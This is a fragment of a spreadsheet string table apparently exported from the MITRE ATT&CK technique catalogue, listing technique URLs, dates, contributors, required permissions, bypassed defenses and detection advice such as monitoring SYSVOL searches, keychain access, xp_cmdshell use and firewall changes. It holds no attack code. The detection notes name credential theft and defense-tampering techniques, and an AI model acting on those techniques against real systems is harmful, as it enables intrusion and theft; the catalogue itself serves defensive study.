    <t>https://attack.mitre.org/techniques/T1201</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1202</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1203</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</si>
  <si>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</si>
  <si>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Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204</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</si>
  <si>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</si>
  <si>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Oleg Skulkin, Group-IB</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1204/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1204/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1204/003</t>
  </si>
  <si>
    <t>30 March 2021</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1205</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</si>
  <si>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</si>
  <si>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Defensive network service scanning</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>01 July 2020</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>Vincent Le Toux</t>
  </si>
  <si>
    <t>Log analysis</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1210</t>
  </si>
  <si>
    <t>Unpatched software or otherwise vulnerable target. Depending on the target and goal, the system and exploitable service may need to be remotely accessible from the internal network.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1211</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</si>
  <si>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</si>
  <si>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Anti-virus, System access controls</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1212</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1213</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1213/001</t>
  </si>
  <si>
    <t>14 February 2020</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</si>
  <si>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</si>
  <si>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SaaS</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1213/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1213/003</t>
  </si>
  <si>
    <t>11 May 2021</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1216</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>03 February 2020</t>
  </si>
  <si>
    <t>Atul Nair, Qualys</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1217</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218</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</si>
  <si>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</si>
  <si>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Anti-virus, Application control, Digital Certificate Validation</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/001</t>
  </si>
  <si>
    <t>23 January 2020</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</si>
  <si>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</si>
  <si>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Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/002</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</si>
  <si>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</si>
  <si>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ESET</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/004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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/005</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>24 January 2020</t>
  </si>
  <si>
    <t>07 June 2021</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/008</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/009</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</si>
  <si>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</si>
  <si>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Casey Smith</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/010</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/011</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/012</t>
  </si>
  <si>
    <t>10 August 2020</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</si>
  <si>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</si>
  <si>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Rodrigo Garcia, Red Canary</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/013</t>
  </si>
  <si>
    <t>22 September 2021</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/014</t>
  </si>
  <si>
    <t>28 September 2021</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</si>
  <si>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</si>
  <si>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Wes Hurd</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1219</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1220</t>
  </si>
  <si>
    <t>17 October 2018</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</si>
  <si>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</si>
  <si>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Microsoft Core XML Services (MSXML) or access to wmic.exe</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1221</t>
  </si>
  <si>
    <t>Static File Analysis</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222</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</si>
  <si>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</si>
  <si>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File system access controls</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>04 February 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1222/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1480</t>
  </si>
  <si>
    <t>31 January 2019</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</si>
  <si>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</si>
  <si>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Nick Carr, Mandiant</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1480/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1482</t>
  </si>
  <si>
    <t>14 February 2019</t>
  </si>
  <si>
    <t>17 September 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1484</t>
  </si>
  <si>
    <t>07 March 2019</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1484/001</t>
  </si>
  <si>
    <t>28 December 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1484/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1485</t>
  </si>
  <si>
    <t>14 March 2019</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</si>
  <si>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</si>
  <si>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Availability</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>15 March 2019</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>29 March 2019</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1490</t>
  </si>
  <si>
    <t>02 April 2019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491</t>
  </si>
  <si>
    <t>08 April 2019</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</si>
  <si>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</si>
  <si>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Integrity</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>20 February 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1491/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1495</t>
  </si>
  <si>
    <t>12 April 2019</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1496</t>
  </si>
  <si>
    <t>17 April 2019</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1497</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</si>
  <si>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</si>
  <si>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Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>06 March 2020</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</si>
  <si>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</si>
  <si>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Deloitte Threat Library Team</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1497/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1497/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1498</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>02 March 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1498/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1499</t>
  </si>
  <si>
    <t>18 April 2019</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1499/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1499/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1499/004</t>
  </si>
  <si>
    <t>Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505</t>
  </si>
  <si>
    <t>28 June 2019</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1505/001</t>
  </si>
  <si>
    <t>12 December 2019</t>
  </si>
  <si>
    <t>On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.</t>
  </si>
  <si>
    <t>Linux, Windows</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1505/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1505/003</t>
  </si>
  <si>
    <t>13 December 2019</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</si>
  <si>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</si>
  <si>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Arnim Rupp, Deutsche Lufthansa AG</t>
  </si>
  <si>
    <t>Adversary access to Web server with vulnerability or account to upload and serve the Web shell file.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1505/004</t>
  </si>
  <si>
    <t>03 June 2021</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1518</t>
  </si>
  <si>
    <t>16 September 2019</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1518/001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</si>
  <si>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</si>
  <si>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Implant Internal Image</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>04 September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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1526</t>
  </si>
  <si>
    <t>30 August 2019</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1528</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1529</t>
  </si>
  <si>
    <t>04 October 2019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1530</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</si>
  <si>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</si>
  <si>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IaaS</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1531</t>
  </si>
  <si>
    <t>09 October 2019</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1534</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1535</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</si>
  <si>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</si>
  <si>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Netskope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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1537</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1538</t>
  </si>
  <si>
    <t>Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>08 October 2019</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>13 November 2019</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542/001</t>
  </si>
  <si>
    <t>19 December 2019</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542/002</t>
  </si>
  <si>
    <t>Ability to update component device firmware from the host operating system.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542/003</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542/004</t>
  </si>
  <si>
    <t>There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542/005</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1543</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1543/001</t>
  </si>
  <si>
    <t>17 January 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1543/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1543/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546</t>
  </si>
  <si>
    <t>22 January 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/002</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</si>
  <si>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</si>
  <si>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Bartosz Jerzman</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/005</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/006</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/007</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/008</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</si>
  <si>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</si>
  <si>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Paul Speulstra, AECOM Global Security Operations Center</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/010</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</si>
  <si>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</si>
  <si>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Secure boot disabled on systems running Windows 8 and later</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/012</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</si>
  <si>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</si>
  <si>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Oddvar Moe, @oddvarmoe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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/013</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/014</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Ivan Sinyakov</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/015</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</si>
  <si>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</si>
  <si>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Elastic</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547</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</si>
  <si>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</si>
  <si>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Administrator, User, root</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/003</t>
  </si>
  <si>
    <t>Scott Lundgren, @5twenty9, Carbon Black</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/005</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/006</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/007</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/008</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/009</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>05 October 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/013</t>
  </si>
  <si>
    <t>10 September 2019</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/014</t>
  </si>
  <si>
    <t>18 December 2020</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</si>
  <si>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</si>
  <si>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Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/015</t>
  </si>
  <si>
    <t>05 October 2021</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>30 January 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/002</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</si>
  <si>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</si>
  <si>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Windows User Account Control</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1548/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1550</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</si>
  <si>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</si>
  <si>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System Access Controls</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1550/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1550/003</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</si>
  <si>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</si>
  <si>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Kerberos authentication enabled</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1550/004</t>
  </si>
  <si>
    <t>12 October 2021</t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/001</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</si>
  <si>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</si>
  <si>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Access to files</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/002</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</si>
  <si>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</si>
  <si>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Sudhanshu Chauhan, @Sudhanshu_C</t>
  </si>
  <si>
    <t>Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files. 
Deploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/003</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</si>
  <si>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</si>
  <si>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Matt Graeber, @mattifestation, SpecterOps</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/004</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</si>
  <si>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</si>
  <si>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Digital Certificate Validation</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/005</t>
  </si>
  <si>
    <t>22 February 2021</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/006</t>
  </si>
  <si>
    <t>23 April 2021</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</si>
  <si>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</si>
  <si>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Abel Morales, Exabeam</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1554</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</si>
  <si>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</si>
  <si>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CrowdStrike Falcon OverWatch</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1555/001</t>
  </si>
  <si>
    <t>12 February 2020</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1555/004</t>
  </si>
  <si>
    <t>29 April 2021</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>22 January 2021</t>
  </si>
  <si>
    <t>Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. 
Consider monitoring file reads surrounding known password manager applications.</t>
  </si>
  <si>
    <t>Matt Burrough, @mattburrough, Microsoft</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556</t>
  </si>
  <si>
    <t>Chris Ross @xorrior</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>26 June 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1557/002</t>
  </si>
  <si>
    <t>15 October 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558/001</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</si>
  <si>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</si>
  <si>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Itamar Mizrahi, Cymptom</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558/003</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</si>
  <si>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</si>
  <si>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Valid domain account or the ability to sniff traffic within a domain</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>24 August 2020</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</si>
  <si>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</si>
  <si>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Valid domain account</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1559/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1559/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1560</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1560/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1560/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1560/003</t>
  </si>
  <si>
    <t>Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1561/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/006</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</si>
  <si>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</si>
  <si>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Anti-virus, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>Monitor cloud logs for modification or creation of new security groups or firewall rules.</t>
  </si>
  <si>
    <t>Expel</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/008</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/009</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/010</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1563</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1563/001</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</si>
  <si>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</si>
  <si>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SSH service enabled, trust relationships configured, established connections</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1563/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>26 February 2020</t>
  </si>
  <si>
    <t>Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/001</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>Omkar Gudhate</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/003</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</si>
  <si>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</si>
  <si>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Travis Smith, Tripwire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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/004</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</si>
  <si>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</si>
  <si>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NTFS partitioned hard drive</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/005</t>
  </si>
  <si>
    <t>28 June 2020</t>
  </si>
  <si>
    <t>29 June 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/007</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</si>
  <si>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</si>
  <si>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Rick Cole, Mandiant</t>
  </si>
  <si>
    <t>MS Office version specified in &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream must match host</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/008</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</si>
  <si>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</si>
  <si>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Dor Edry, Microsoft</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/009</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1565</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1565/003</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566</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</si>
  <si>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</si>
  <si>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Philip Winther</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1566/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1566/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1566/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1567</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1567/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1567/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1568</t>
  </si>
  <si>
    <t>10 March 2020</t>
  </si>
  <si>
    <t>02 October 2020</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</si>
  <si>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</si>
  <si>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Chris Roffe</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1568/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1568/002</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</si>
  <si>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</si>
  <si>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</si>
